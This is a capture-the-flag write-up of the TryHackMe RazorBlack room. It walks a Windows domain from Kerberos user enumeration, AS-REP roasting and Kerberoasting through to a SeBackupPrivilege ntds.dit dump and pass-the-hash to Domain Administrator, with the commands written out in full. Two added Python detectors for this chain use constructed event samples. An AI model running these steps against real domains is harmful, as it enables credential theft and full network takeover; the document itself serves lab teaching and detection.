# RazorBlack

{% hint style="info" %}
This write-up does not cover the individual flags for the room. It is treated as a boot-to-root, from external access through to Domain Administrator.
{% endhint %}

## Nmap

```
sudo nmap 10.10.150.205 -p- -sS -sV

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-13 10:02:50Z)
111/tcp   open  rpcbind       2-4 (RPC #100000)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
2049/tcp  open  mountd        1-3 (RPC #100005)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  msrpc         Microsoft Windows RPC
49707/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: HAVEN-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
```

### Kerberos user enumeration

Hitting Kerberos first, we perform user enumeration with `kerbrute`.

```
kerbrute userenum '/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt' --dc '10.10.35.255' --domain 'raz0rblack.thm'
```

After a short while we obtain a couple of usernames.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FKB1scCVuMmjWOhcxPRGN%2Fimage.png?alt=media\&token=b771e9e7-035c-48c7-a184-8f35078fc1b4)

### No Pre-Authentication

With a couple of known usernames we run them through Impacket's `GetNPUsers.py`. We find that the user *twilliams* has [No Pre-Authentication](https://ldapwiki.com/wiki/Kerberos%20Pre-Authentication) enabled in Active Directory.

```
GetNPUsers.py 'raz0rblack.thm'/'twilliams': -request -dc-ip '10.10.146.253' -format 'john' -no-pass
```

As such, we are able to pull the `krb5asrep` hash for the account, which can then be handed to `John` for cracking.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FxfKZ7ns4VisoUgDut0ga%2Fimage.png?alt=media\&token=0465f639-29d3-467a-ac6c-3102369827aa)

### Hash Cracking #1

After a few minutes of cracking against the `rockyou.txt` word list, we reveal the plaintext password.

```
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F8QS9Q2V14ejls6QhFFJG%2F2022-08-13_06-56_1.png?alt=media\&token=22c07e26-5b19-4cdc-9885-1913e1d152c2)

### Service Principal Names

With a set of valid credentials we find we are unable to proceed via SMB. Using the same credentials to check for Service Principal Names with Impacket's `GetUserSPNs.py`, we are able to pull a hash for the user *xyan1d3*.

```
GetUserSPNs.py raz0rblack.thm/twilliams:'<Password>' -dc-ip '10.10.146.253' -request
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FHOw3RTjWdKRfPxPEjFDO%2Fimage.png?alt=media\&token=2bab0c56-6fb6-482c-ac2e-d6a4f85a58e3)

### Hash Cracking #2

Taking the `krb5tgs` hash, we are again able to crack it with `John` and the `rockyou.txt` list.
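The three Kerberos steps above (username enumeration, the AS-REP for a no-pre-auth account, and the RC4 service ticket for a user SPN) each leave a distinct trace in Security events 4768 and 4769 on the domain controller. The following is an added detection example, not part of the original write-up or the room; the event records are constructed samples in the shape of the 4768/4769 fields, and the threshold is an assumption.

```python
"""Detect the Kerberos attack chain (user enumeration, AS-REP roasting,
Kerberoasting) from Windows Security events 4768/4769.
All events below are constructed samples, not logs from the room."""
from collections import Counter

# Constructed sample events: one record per KDC event, with the 4768/4769
# fields that matter for detection (status = Result Code, etype = Ticket
# Encryption Type, preauth = Pre-Authentication Type).
EVENTS = [
    {"id": 4768, "client": "10.10.14.5", "user": "zzz", "status": "0x6"},
    {"id": 4768, "client": "10.10.14.5", "user": "admin2", "status": "0x6"},
    {"id": 4768, "client": "10.10.14.5", "user": "test", "status": "0x6"},
    {"id": 4768, "client": "10.10.14.5", "user": "twilliams", "status": "0x0",
     "preauth": 0, "etype": "0x17"},
    {"id": 4769, "client": "10.10.14.5", "user": "twilliams@RAZ0RBLACK.THM",
     "service": "xyan1d3", "etype": "0x17"},
    {"id": 4769, "client": "10.10.14.9", "user": "jdoe@RAZ0RBLACK.THM",
     "service": "HAVEN-DC$", "etype": "0x12"},
    {"id": 4768, "client": "10.10.14.9", "user": "jdoe", "status": "0x0",
     "preauth": 2, "etype": "0x12"},
]

def detect(events, enum_threshold=3):
    """Return a list of (rule, client, subject) findings."""
    findings = []
    # Rule 1: many 4768 failures with 0x6 (client principal unknown) from one
    # source is the signature of username guessing such as kerbrute userenum.
    unknown = Counter(e["client"] for e in events
                      if e["id"] == 4768 and e["status"] == "0x6")
    for client, n in unknown.items():
        if n >= enum_threshold:
            findings.append(("kerberos-user-enum", client, f"{n} unknown principals"))
    for e in events:
        # Rule 2: a TGT issued with Pre-Authentication Type 0 means the account
        # does not require pre-auth; an RC4 (0x17) AS-REP is crackable offline.
        if e["id"] == 4768 and e.get("preauth") == 0 and e["etype"] == "0x17":
            findings.append(("asrep-roast", e["client"], e["user"]))
        # Rule 3: an RC4 service ticket for a user-account SPN (not a machine
        # account ending in $, not krbtgt) is the Kerberoasting pattern.
        if (e["id"] == 4769 and e["etype"] == "0x17"
                and not e["service"].endswith("$") and e["service"] != "krbtgt"):
            findings.append(("kerberoast", e["client"], e["service"]))
    return findings

if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(*finding)
```

The fix on the directory side is the same for all three findings: clear the no-pre-auth flag on accounts like *twilliams*, and give service accounts long random passwords (or gMSA) with AES-only encryption so an RC4 ticket is never issued.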

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fcrcsfk2QGW7L8NqPOlYm%2F2022-08-13_06-55.png?alt=media\&token=fafa6c29-05d9-493f-9ab7-dfb6a74f9785)

### WinRM

With another valid set of credentials we find we are able to log in over `WinRM` for remote access using [Evil-WinRM](https://github.com/Hackplayers/evil-winrm).

```
evil-winrm -i '10.10.35.255' -u 'xyan1d3' -p '<Password>'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Frkgiim7e4YbOnwkP0bi3%2Fimage.png?alt=media\&token=b1f7959b-8e2b-4e94-a189-88ecabbb14f1)

### SeBackupPrivilege

Performing basic enumeration we find that our current user is a member of the "Backup Operators" group and holds the **SeBackupPrivilege** privilege.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fl5vFxOT5pUdgQs5wQ53Y%2Fimage.png?alt=media\&token=862e9840-203f-4199-b4c5-5743c3174254)

{% content-ref url="../linux/fusion-corp" %}
[fusion-corp](https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/linux/fusion-corp)
{% endcontent-ref %}

This privilege grants us the ability to create backups of any file on the system. Knowing this, a high-value target is the `ntds.dit` file, the Active Directory database that holds the hashes for domain objects and users. As `ntds.dit` is in constant use, we are unable to copy it by normal means because the system keeps the file locked.

What we can do instead is create a Distributed Shell File (DSH). This file contains the commands for the `diskshadow` utility to snapshot the C: drive and ultimately expose the *`ntds.dit`* file.

First, create a file called `viper.dsh` on the attacking machine with the following contents:

```
set context persistent nowriters
add volume c: alias viper
create
expose %viper% x:
```

Once complete, use `unix2dos` to convert the file to DOS line endings.

```
unix2dos viper.dsh
```

Then, on the target system, create the directory `c:\temp` and upload the `viper.dsh` file into it.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FjPLe2HyBIBUROOe1nlgp%2Fimage.png?alt=media\&token=6e8e9fdb-1a52-48f9-9260-08b4eb3089af)

Then execute `diskshadow` against the file.

```
diskshadow /s viper.dsh
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FDbtNv2sXINUtKJyz5kzW%2Fimage.png?alt=media\&token=850741ef-5d5f-46c5-b663-eb7d3e9448ae)

After creating the shadow copy we can then use `robocopy` to copy the `ntds` database to our current working directory.

```
robocopy /b x:\windows\ntds . ntds.dit
```

From here we need to extract the SYSTEM hive which will be required for extracting the hashes with Impacket later.

```
reg save hklm\system c:\Temp\system
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FOifC7IcVSDLAXp723hhk%2Fimage.png?alt=media\&token=3232c640-1936-49fa-8d51-381d48b0e552)

After the SYSTEM hive has been saved, download both files to the attacking machine.

```
download ntds.dit
download system
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FEMyIcLpX4HEoQG5RPSbv%2Fimage.png?alt=media\&token=c1be0d01-23b5-4db6-a02a-ae2e6bc1763a)

Back on the attacking machine use the following command with Impacket's `secretsdump.py` to extract the hashes from `ntds.dit`.

```
secretsdump.py -ntds ntds.dit -system system local
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FiVJCSoat82xrEYqZQCwr%2Fimage.png?alt=media\&token=06bbc144-63cc-4e43-9c1e-012703b66514)
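The backup-privilege chain above is three ordinary built-in commands (diskshadow with a script, robocopy in backup mode against the ntds folder, reg save of the SYSTEM hive) run in one logon session, which is exactly what makes it detectable when process command-line auditing (Security 4688) is on. The following is an added example, not code from the original write-up or the room; the 4688 records and logon IDs are constructed samples.

```python
"""Flag the SeBackupPrivilege-to-ntds.dit chain from process-creation events
(Security 4688 with command-line auditing enabled).
The events below are constructed samples, not logs from the room."""
import re

# Constructed sample 4688 records: (logon_id, process, command_line).
PROCESS_EVENTS = [
    ("0x3e7",   "C:\\Windows\\System32\\svchost.exe", "svchost.exe -k netsvcs"),
    ("0x5a1c2", "C:\\Windows\\System32\\diskshadow.exe", "diskshadow /s viper.dsh"),
    ("0x5a1c2", "C:\\Windows\\System32\\Robocopy.exe", "robocopy /b x:\\windows\\ntds . ntds.dit"),
    ("0x5a1c2", "C:\\Windows\\System32\\reg.exe", "reg save hklm\\system c:\\Temp\\system"),
    ("0x77b0",  "C:\\Windows\\System32\\Robocopy.exe", "robocopy /b \\\\fs01\\share D:\\backup /mir"),
]

# Each stage of the chain as a regex over the command line. A plain backup
# job (robocopy /b against a file share) matches none of them.
STAGES = {
    "shadow-copy": re.compile(r"\bdiskshadow(\.exe)?\s+/s\b", re.I),
    "ntds-copy":   re.compile(r"\brobocopy(\.exe)?\b.*\s/b\b.*\bntds\b", re.I),
    "system-hive": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I),
}

def stage_hits(events):
    """Map each logon session to the set of chain stages seen in it."""
    hits = {}
    for logon_id, _proc, cmdline in events:
        for stage, pattern in STAGES.items():
            if pattern.search(cmdline):
                hits.setdefault(logon_id, set()).add(stage)
    return hits

def classify(events):
    """Return {logon_id: verdict}. A single stage is worth a look; a session
    that produces both the shadow copy and the ntds copy matches the full
    credential-database theft pattern regardless of the hive step."""
    result = {}
    for logon_id, stages in stage_hits(events).items():
        if {"shadow-copy", "ntds-copy"} <= stages:
            result[logon_id] = "high: ntds.dit extraction chain"
        else:
            result[logon_id] = "medium: " + ", ".join(sorted(stages))
    return result

if __name__ == "__main__":
    for logon_id, verdict in classify(PROCESS_EVENTS).items():
        print(logon_id, verdict)
```

On the prevention side, membership of Backup Operators on a domain controller is equivalent to domain admin and should be audited as such, and the 4672 event that lists SeBackupPrivilege at logon gives an earlier signal than the process events.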

### WinRM (Administrator)

With the Administrator's hash we can use `Evil-WinRM` again to log in as the Domain Administrator.

```
evil-winrm -i '10.10.95.150' -u 'administrator' -H '<Hash>'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FG6rSTIGEOHyOKF8l6ALS%2Fimage.png?alt=media\&token=07c63a53-822f-4f06-ad27-36334b4e3c93)
